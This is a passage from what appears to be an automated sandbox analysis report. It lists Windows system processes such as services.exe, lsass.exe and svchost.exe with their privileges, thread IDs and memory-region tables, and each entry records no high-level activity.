| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2DC
0x
2C0
0x
1D0
|
Process #38: services.exe
0
0
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\system32\services.exe |
| Command Line | C:\Windows\system32\services.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1e4 |
| Parent PID | 0x194 (c:\windows\system32\wininit.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
354
0x
338
0x
334
0x
25C
0x
23C
0x
D14
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000001d813e0000 | 0x1d813e0000 | 0x1d813effff | Pagefile Backed Memory | rw |
|
|
|
- |
| services.exe.mui | 0x1d813f0000 | 0x1d813f4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000001d81400000 | 0x1d81400000 | 0x1d81413fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001d814a0000 | 0x1d814a0000 | 0x1d814a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001d814b0000 | 0x1d814b0000 | 0x1d814b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001d81540000 | 0x1d81540000 | 0x1d81540fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81570000 | 0x1d81570000 | 0x1d81576fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81580000 | 0x1d81580000 | 0x1d815fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81600000 | 0x1d81600000 | 0x1d816fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x1d81700000 | 0x1d817bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001d818b0000 | 0x1d818b0000 | 0x1d818b6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81900000 | 0x1d81900000 | 0x1d819fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81a00000 | 0x1d81a00000 | 0x1d81a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81b80000 | 0x1d81b80000 | 0x1d81bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81c00000 | 0x1d81c00000 | 0x1d81c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81d80000 | 0x1d81d80000 | 0x1d81dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001d81e00000 | 0x1d81e00000 | 0x1d81efffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff290000 | 0x7df5ff290000 | 0x7ff5ff28ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6c0ef4000 | 0x7ff6c0ef4000 | 0x7ff6c0ef5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6c0efa000 | 0x7ff6c0efa000 | 0x7ff6c0efbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6c0efc000 | 0x7ff6c0efc000 | 0x7ff6c0efdfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6c0f00000 | 0x7ff6c0f00000 | 0x7ff6c0ffffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6c1000000 | 0x7ff6c1000000 | 0x7ff6c1022fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6c1025000 | 0x7ff6c1025000 | 0x7ff6c1025fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6c1026000 | 0x7ff6c1026000 | 0x7ff6c1027fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6c102a000 | 0x7ff6c102a000 | 0x7ff6c102bfff | Private Memory | rw |
|
|
|
- |
| services.exe | 0x7ff6c1800000 | 0x7ff6c186ffff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffaf13a0000 | 0x7ffaf13affff | Memory Mapped File | rwx |
|
|
|
- |
| authz.dll | 0x7ffaf3500000 | 0x7ffaf3547fff | Memory Mapped File | rwx |
|
|
|
- |
| scesrv.dll | 0x7ffaf3550000 | 0x7ffaf35ddfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffaf3700000 | 0x7ffaf3725fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| spinf.dll | 0x7ffaf4210000 | 0x7ffaf422afff | Memory Mapped File | rwx |
|
|
|
- |
| eventaggregation.dll | 0x7ffaf4230000 | 0x7ffaf4249fff | Memory Mapped File | rwx |
|
|
|
- |
| dabapi.dll | 0x7ffaf4250000 | 0x7ffaf4257fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #39: lsass.exe
0
0
| Information | Value |
|---|---|
| ID | #39 |
| File Name | c:\windows\system32\lsass.exe |
| Command Line | C:\Windows\system32\lsass.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1ec |
| Parent PID | 0x194 (c:\windows\system32\wininit.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeCreateTokenPrivilege, SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
DB8
0x
228
0x
214
0x
210
0x
20C
0x
208
0x
1F0
0x
F0C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000031bac00000 | 0x31bac00000 | 0x31bac0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000031bac10000 | 0x31bac10000 | 0x31bac10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000031bac20000 | 0x31bac20000 | 0x31bac33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000031bac40000 | 0x31bac40000 | 0x31bacbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000031bacc0000 | 0x31bacc0000 | 0x31bacc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000031bacd0000 | 0x31bacd0000 | 0x31bacd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000031bace0000 | 0x31bace0000 | 0x31bace1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x31bacf0000 | 0x31badadfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000031badb0000 | 0x31badb0000 | 0x31badb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000031badc0000 | 0x31badc0000 | 0x31badcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| lsasrv.dll.mui | 0x31badd0000 | 0x31baddafff | Memory Mapped File | r |
|
|
|
- |
| msprivs.dll | 0x31bade0000 | 0x31bade2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000031badf0000 | 0x31badf0000 | 0x31badfffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000031bae00000 | 0x31bae00000 | 0x31bae00fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bae10000 | 0x31bae10000 | 0x31bae16fff | Private Memory | rw |
|
|
|
- |
| 5b8a3202-35dc-4437-b5d7-374f5e872415 | 0x31bae20000 | 0x31bae20fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000031bae20000 | 0x31bae20000 | 0x31bae20fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bae20000 | 0x31bae20000 | 0x31bae9ffff | Private Memory | rw |
|
|
|
- |
| c_28591.nls | 0x31baea0000 | 0x31baeb0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000031baec0000 | 0x31baec0000 | 0x31baec0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031baed0000 | 0x31baed0000 | 0x31baed0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031baee0000 | 0x31baee0000 | 0x31baee0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031baef0000 | 0x31baef0000 | 0x31baef0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031baf00000 | 0x31baf00000 | 0x31baffffff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb000000 | 0x31bb000000 | 0x31bb07ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb080000 | 0x31bb080000 | 0x31bb0fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb100000 | 0x31bb100000 | 0x31bb17ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb180000 | 0x31bb180000 | 0x31bb180fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb190000 | 0x31bb190000 | 0x31bb190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb1a0000 | 0x31bb1a0000 | 0x31bb1a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb1b0000 | 0x31bb1b0000 | 0x31bb1b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb1c0000 | 0x31bb1c0000 | 0x31bb1c6fff | Private Memory | rw |
|
|
|
- |
| vaultsvc.dll.mui | 0x31bb1d0000 | 0x31bb1d0fff | Memory Mapped File | r |
|
|
|
- |
| crypt32.dll.mui | 0x31bb1f0000 | 0x31bb1f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000031bb200000 | 0x31bb200000 | 0x31bb2fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb300000 | 0x31bb300000 | 0x31bb37ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x31bb380000 | 0x31bb6b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000031bb6c0000 | 0x31bb6c0000 | 0x31bb73ffff | Private Memory | rw |
|
|
|
- |
| dnsapi.dll.mui | 0x31bb7c0000 | 0x31bb7d1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000031bb800000 | 0x31bb800000 | 0x31bb8fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000031bb900000 | 0x31bb900000 | 0x31bb9fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffb80000 | 0x7df5ffb80000 | 0x7ff5ffb7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff680fbc000 | 0x7ff680fbc000 | 0x7ff680fbdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff680fbe000 | 0x7ff680fbe000 | 0x7ff680fbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff680fc0000 | 0x7ff680fc0000 | 0x7ff6810bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6810c0000 | 0x7ff6810c0000 | 0x7ff6810e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6810e4000 | 0x7ff6810e4000 | 0x7ff6810e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6810e6000 | 0x7ff6810e6000 | 0x7ff6810e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6810e8000 | 0x7ff6810e8000 | 0x7ff6810e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6810ea000 | 0x7ff6810ea000 | 0x7ff6810ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6810ec000 | 0x7ff6810ec000 | 0x7ff6810edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6810ee000 | 0x7ff6810ee000 | 0x7ff6810effff | Private Memory | rw |
|
|
|
- |
| lsass.exe | 0x7ff681b50000 | 0x7ff681b5ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x7ffae9750000 | 0x7ffae9763fff | Memory Mapped File | rwx |
|
|
|
- |
| dssenh.dll | 0x7ffae9770000 | 0x7ffae9797fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptprov.dll | 0x7ffae97a0000 | 0x7ffae97f8fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x7ffae9800000 | 0x7ffae981efff | Memory Mapped File | rwx |
|
|
|
- |
| vaultsvc.dll | 0x7ffaf0500000 | 0x7ffaf0552fff | Memory Mapped File | rwx |
|
|
|
- |
| fvecerts.dll | 0x7ffaf0610000 | 0x7ffaf061bfff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7ffaf0680000 | 0x7ffaf073dfff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7ffaf1880000 | 0x7ffaf18e4fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffaf3360000 | 0x7ffaf3382fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| scecli.dll | 0x7ffaf3640000 | 0x7ffaf368afff | Memory Mapped File | rwx |
|
|
|
- |
| dpapisrv.dll | 0x7ffaf3690000 | 0x7ffaf36c4fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffaf36d0000 | 0x7ffaf36ebfff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffaf36f0000 | 0x7ffaf36fbfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffaf3700000 | 0x7ffaf3725fff | Memory Mapped File | rwx |
|
|
|
- |
| efslsaext.dll | 0x7ffaf3730000 | 0x7ffaf374ffff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7ffaf3750000 | 0x7ffaf375cfff | Memory Mapped File | rwx |
|
|
|
- |
| pcptpm12.dll | 0x7ffaf3760000 | 0x7ffaf37dafff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffaf37e0000 | 0x7ffaf3811fff | Memory Mapped File | rwx |
|
|
|
- |
| pcpksp.dll | 0x7ffaf3820000 | 0x7ffaf3838fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7ffaf3840000 | 0x7ffaf38b3fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ffaf38c0000 | 0x7ffaf38c9fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoftaccountcloudap.dll | 0x7ffaf38d0000 | 0x7ffaf3914fff | Memory Mapped File | rwx |
|
|
|
- |
| cloudap.dll | 0x7ffaf3920000 | 0x7ffaf3951fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| wdigest.dll | 0x7ffaf39a0000 | 0x7ffaf39dafff | Memory Mapped File | rwx |
|
|
|
- |
| pku2u.dll | 0x7ffaf39e0000 | 0x7ffaf3a27fff | Memory Mapped File | rwx |
|
|
|
- |
| tspkg.dll | 0x7ffaf3a30000 | 0x7ffaf3a4bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x7ffaf3a70000 | 0x7ffaf3aadfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffaf3ab0000 | 0x7ffaf3b57fff | Memory Mapped File | rwx |
|
|
|
- |
| netlogon.dll | 0x7ffaf3b60000 | 0x7ffaf3c31fff | Memory Mapped File | rwx |
|
|
|
- |
| msv1_0.dll | 0x7ffaf3c40000 | 0x7ffaf3c9efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| kerbclientshared.dll | 0x7ffaf3d20000 | 0x7ffaf3d47fff | Memory Mapped File | rwx |
|
|
|
- |
| kerberos.dll | 0x7ffaf3d50000 | 0x7ffaf3e43fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptdll.dll | 0x7ffaf3e50000 | 0x7ffaf3e63fff | Memory Mapped File | rwx |
|
|
|
- |
| negoexts.dll | 0x7ffaf3e70000 | 0x7ffaf3e98fff | Memory Mapped File | rwx |
|
|
|
- |
| joinutil.dll | 0x7ffaf3ea0000 | 0x7ffaf3ec0fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x7ffaf3ed0000 | 0x7ffaf3f05fff | Memory Mapped File | rwx |
|
|
|
- |
| samsrv.dll | 0x7ffaf3f10000 | 0x7ffaf3fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| lsasrv.dll | 0x7ffaf3ff0000 | 0x7ffaf4153fff | Memory Mapped File | rwx |
|
|
|
- |
| sspisrv.dll | 0x7ffaf4160000 | 0x7ffaf416bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntlmshared.dll | 0x7ffaf4170000 | 0x7ffaf417afff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7ffaf4180000 | 0x7ffaf41a5fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| netprovfw.dll | 0x7ffaf41f0000 | 0x7ffaf4204fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #40: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k DcomLaunch |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x240 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
F50
0x
E3C
0x
BD8
0x
834
0x
82C
0x
68C
0x
644
0x
590
0x
630
0x
5FC
0x
3F8
0x
320
0x
2CC
0x
2C8
0x
2A8
0x
2A4
0x
284
0x
264
0x
258
0x
244
0x
B20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000dbba060000 | 0xdbba060000 | 0xdbba06ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dbba070000 | 0xdbba070000 | 0xdbba074fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbba080000 | 0xdbba080000 | 0xdbba093fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dbba0a0000 | 0xdbba0a0000 | 0xdbba11ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbba120000 | 0xdbba120000 | 0xdbba123fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dbba130000 | 0xdbba130000 | 0xdbba130fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dbba140000 | 0xdbba140000 | 0xdbba141fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xdbba150000 | 0xdbba20dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dbba210000 | 0xdbba210000 | 0xdbba28ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbba290000 | 0xdbba290000 | 0xdbba290fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dbba2a0000 | 0xdbba2a0000 | 0xdbba2a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dbba2b0000 | 0xdbba2b0000 | 0xdbba2b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dbba2c0000 | 0xdbba2c0000 | 0xdbba2c6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba2d0000 | 0xdbba2d0000 | 0xdbba2d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba2e0000 | 0xdbba2e0000 | 0xdbba2e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbba2f0000 | 0xdbba2f0000 | 0xdbba2f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dbba300000 | 0xdbba300000 | 0xdbba300fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dbba310000 | 0xdbba310000 | 0xdbba316fff | Private Memory | rw |
|
|
|
- |
| lsm.dll.mui | 0xdbba320000 | 0xdbba322fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dbba330000 | 0xdbba330000 | 0xdbba336fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba340000 | 0xdbba340000 | 0xdbba3bffff | Private Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xdbba3c0000 | 0xdbba3c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dbba3d0000 | 0xdbba3d0000 | 0xdbba3d6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba3e0000 | 0xdbba3e0000 | 0xdbba3e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba3f0000 | 0xdbba3f0000 | 0xdbba3f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba400000 | 0xdbba400000 | 0xdbba4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba500000 | 0xdbba500000 | 0xdbba5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba600000 | 0xdbba600000 | 0xdbba6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba700000 | 0xdbba700000 | 0xdbba77ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba780000 | 0xdbba780000 | 0xdbba7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba800000 | 0xdbba800000 | 0xdbba8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbba900000 | 0xdbba900000 | 0xdbba97ffff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0xdbba900000 | 0xdbba97afff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dbba980000 | 0xdbba980000 | 0xdbbaa7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbaa80000 | 0xdbbaa80000 | 0xdbbaafffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbbab00000 | 0xdbbab00000 | 0xdbbab00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dbbab10000 | 0xdbbab10000 | 0xdbbab10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dbbab20000 | 0xdbbab20000 | 0xdbbab49fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dbbab80000 | 0xdbbab80000 | 0xdbbac7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbac80000 | 0xdbbac80000 | 0xdbbad7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbad80000 | 0xdbbad80000 | 0xdbbae7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbae80000 | 0xdbbae80000 | 0xdbbaefffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbaf00000 | 0xdbbaf00000 | 0xdbbaffffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xdbbb100000 | 0xdbbb436fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dbbb540000 | 0xdbbb540000 | 0xdbbb63ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbbb640000 | 0xdbbb640000 | 0xdbbb6fffff | Pagefile Backed Memory | r |
|
|
|
- |
